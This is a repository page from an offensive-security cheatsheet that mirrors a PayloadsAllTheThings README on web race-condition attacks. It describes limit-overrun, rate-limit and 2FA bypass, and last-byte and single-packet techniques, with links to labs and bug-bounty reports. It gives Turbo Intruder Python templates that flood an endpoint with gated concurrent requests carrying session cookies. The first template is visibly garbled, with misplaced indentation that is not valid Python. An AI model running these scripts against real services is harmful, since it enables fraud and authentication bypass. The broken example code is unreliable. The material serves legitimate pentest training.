daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (8665B)


      1 ---
      2 title: "Race Condition"
      3 topic: "Race Condition"
      4 topicSlug: "race-condition"
      5 sourcePath: "Race Condition/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Race%20Condition/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Race Condition
     12 
     13 > Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language.
     14 
     15 ## Summary
     16 
     17 - [Tools](#tools)
     18 - [Methodology](#methodology)
     19     - [Limit-overrun](#limit-overrun)
     20     - [Rate-limit Bypass](#rate-limit-bypass)
     21 - [Techniques](#techniques)
     22     - [HTTP/1.1 Last-byte Synchronization](#http11-last-byte-synchronization)
     23     - [HTTP/2 Single-packet Attack](#http2-single-packet-attack)
     24 - [Turbo Intruder](#turbo-intruder)
     25     - [Example 1](#example-1)
     26     - [Example 2](#example-2)
     27 - [Labs](#labs)
     28 - [References](#references)
     29 
     30 ## Tools
     31 
     32 - [PortSwigger/turbo-intruder](https://github.com/PortSwigger/turbo-intruder) - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.
     33 - [JavanXD/Raceocat](https://github.com/JavanXD/Raceocat) - Make exploiting race conditions in web applications highly efficient and ease-of-use.
     34 - [nxenon/h2spacex](https://github.com/nxenon/h2spacex) - HTTP/2 Single Packet Attack low Level Library / Tool based on Scapy‌ + Exploit Timing Attacks
     35 
     36 ## Methodology
     37 
     38 ### Limit-overrun
     39 
     40 Limit-overrun refers to a scenario where multiple threads or processes compete to update or access a shared resource, resulting in the resource exceeding its intended limits.
     41 
     42 **Examples**: Overdrawing limit, multiple voting, multiple spending of a giftcard.
     43 
     44 - [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
     45 - [Race conditions can be used to bypass invitation limit - @franjkovic](https://hackerone.com/reports/115007)
     46 - [Register multiple users using one invitation - @franjkovic](https://hackerone.com/reports/148609)
     47 
     48 ### Rate-limit Bypass
     49 
     50 Rate-limit bypass occurs when an attacker exploits the lack of proper synchronization in rate-limiting mechanisms to exceed intended request limits. Rate-limiting is designed to control the frequency of actions (e.g., API requests, login attempts), but race conditions can allow attackers to bypass these restrictions.
     51 
     52 **Examples**: Bypassing anti-bruteforce mechanism and 2FA.
     53 
     54 - [Instagram Password Reset Mechanism Race Condition - Laxman Muthiyah](https://youtu.be/4O9FjTMlHUM)
     55 
     56 ## Techniques
     57 
     58 ### HTTP/1.1 Last-byte Synchronization
     59 
     60 Send every requests except the last byte, then "release" each request by sending the last byte.
     61 
     62 Execute a last-byte synchronization using Turbo Intruder
     63 
     64 ```py
     65 engine.queue(request, gate='race1')
     66 engine.queue(request, gate='race1')
     67 engine.openGate('race1')
     68 ```
     69 
     70 **Examples**:
     71 
     72 - [Cracking reCAPTCHA, Turbo Intruder style - James Kettle](https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style)
     73 
     74 ### HTTP/2 Single-packet Attack
     75 
     76 In HTTP/2 you can send multiple HTTP requests concurrently over a single connection. In the single-packet attack around ~20/30 requests will be sent and they will arrive at the same time on the server. Using a single request remove the network jitter.
     77 
     78 - [PortSwigger/turbo-intruder/race-single-packet-attack.py](https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race-single-packet-attack.py)
     79 - Burp Suite
     80     - Send a request to Repeater
     81     - Duplicate the request 20 times (CTRL+R)
     82     - Create a new group and add all the requests
     83     - Send group in parallel (single-packet attack)
     84 
     85 **Examples**:
     86 
     87 - [CVE-2022-4037 - Discovering a race condition vulnerability in Gitlab with the single-packet attack - James Kettle](https://youtu.be/Y0NVIVucQNE)
     88 
     89 ## Turbo Intruder
     90 
     91 ### Example 1
     92 
     93 1. Send request to turbo intruder
     94 2. Use this python code as a payload of the turbo intruder
     95 
     96    ```python
     97    def queueRequests(target, wordlists):
     98        engine = RequestEngine(endpoint=target.endpoint,
     99                            concurrentConnections=30,
    100                            requestsPerConnection=30,
    101                            pipeline=False
    102                            )
    103 
    104    for i in range(30):
    105        engine.queue(target.req, i)
    106            engine.queue(target.req, target.baseInput, gate='race1')
    107 
    108 
    109        engine.start(timeout=5)
    110    engine.openGate('race1')
    111 
    112        engine.complete(timeout=60)
    113 
    114 
    115    def handleResponse(req, interesting):
    116        table.add(req)
    117    ```
    118 
    119 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
    120 4. Click "Attack"
    121 
    122 ### Example 2
    123 
    124 This following template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.
    125 
    126 ```python
    127 def queueRequests(target, wordlists):
    128     engine = RequestEngine(endpoint=target.endpoint,
    129                            concurrentConnections=30,
    130                            requestsPerConnection=100,
    131                            pipeline=False
    132                            )
    133     request1 = '''
    134 POST /target-URI-1 HTTP/1.1
    135 Host: <REDACTED>
    136 Cookie: session=<REDACTED>
    137 
    138 parameterName=parameterValue
    139     '''
    140 
    141     request2 = '''
    142 GET /target-URI-2 HTTP/1.1
    143 Host: <REDACTED>
    144 Cookie: session=<REDACTED>
    145     '''
    146 
    147     engine.queue(request1, gate='race1')
    148     for i in range(30):
    149         engine.queue(request2, gate='race1')
    150     engine.openGate('race1')
    151     engine.complete(timeout=60)
    152 def handleResponse(req, interesting):
    153     table.add(req)
    154 ```
    155 
    156 ## Labs
    157 
    158 - [PortSwigger - Limit overrun race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun)
    159 - [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint)
    160 - [PortSwigger - Bypassing rate limits via race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-bypassing-rate-limits)
    161 - [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint)
    162 - [PortSwigger - Single-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint)
    163 - [PortSwigger - Exploiting time-sensitive vulnerabilities](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities)
    164 - [PortSwigger - Partial construction race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction)
    165 
    166 ## References
    167 
    168 - [Beyond the Limit: Expanding single-packet race condition with a first sequence sync for breaking the 65,535 byte limit - @ryotkak - August 2, 2024](https://web.archive.org/web/20251116040307/https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)
    169 - [DEF CON 31 - Smashing the State Machine the True Potential of Web Race Conditions - James Kettle (@albinowax) - September 15, 2023](https://web.archive.org/web/20231018114533/https://youtu.be/tKJzsaB1ZvI)
    170 - [Exploiting Race Condition Vulnerabilities in Web Applications - Javan Rasokat - October 6, 2022](https://web.archive.org/web/20221006190254/http://conference.hitb.org/hitbsecconf2022sin/materials/D2%20COMMSEC%20-%20Exploiting%20Race%20Condition%20Vulnerabilities%20in%20Web%20Applications%20-%20Javan%20Rasokat.pdf)
    171 - [New techniques and tools for web race conditions - Emma Stocks - August 10, 2023](https://web.archive.org/web/20230810160828/https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions)
    172 - [Race Condition Bug In Web App: A Use Case - Mandeep Jadon - April 24, 2018](https://web.archive.org/web/20260302041740/https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
    173 - [Race conditions on the web - Josip Franjkovic - July 12, 2016](https://web.archive.org/web/20160712132451/https://www.josipfranjkovic.com/blog/race-conditions-on-web)
    174 - [Smashing the state machine: the true potential of web race conditions - James Kettle (@albinowax) - August 9, 2023](https://web.archive.org/web/20230809185504/https://portswigger.net/research/smashing-the-state-machine)
    175 - [Turbo Intruder: Embracing the billion-request attack - James Kettle (@albinowax) - January 25, 2019](https://web.archive.org/web/20190929052757/https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)